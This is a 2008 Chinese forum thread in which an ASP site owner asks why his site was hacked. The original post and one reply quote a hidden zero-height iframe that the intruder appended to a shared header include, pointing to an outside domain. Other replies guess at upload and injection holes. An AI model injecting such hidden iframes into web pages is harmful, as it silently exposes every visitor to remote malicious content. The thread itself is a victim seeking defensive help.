我网站的asp程序被黑了!

xiaodu 2008-11-23 02:03:22
我用网上的asp产品管理程序,在这几天被人给黑了。
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
...全文
48 点赞 收藏 4
写回复
4 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
gmlwl 2008-11-24
你的程序最大的可能就是有上传漏洞
次之,就是有注入漏洞

把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
回复
virgo2008 2008-11-23
就是增加权限,对上传的东西要严格的控制,还有一种就是注入,你没有过滤掉关键字
回复
xiaodu 2008-11-23
说具体点啊,我用的是时代互联的空间,用ftp工具上传,网站有管理后台,你说的后门是指什么啊,怎么避免啊
回复
virgo2008 2008-11-23
被黑了,被人加了<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0> </iframe>
主要看你的程序是不是有后门,一般是上传的漏洞
回复
相关推荐
发帖
ASP
创建于2007-09-28

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
申请成为版主
帖子事件
创建了帖子
2008-11-23 02:03
社区公告
暂无公告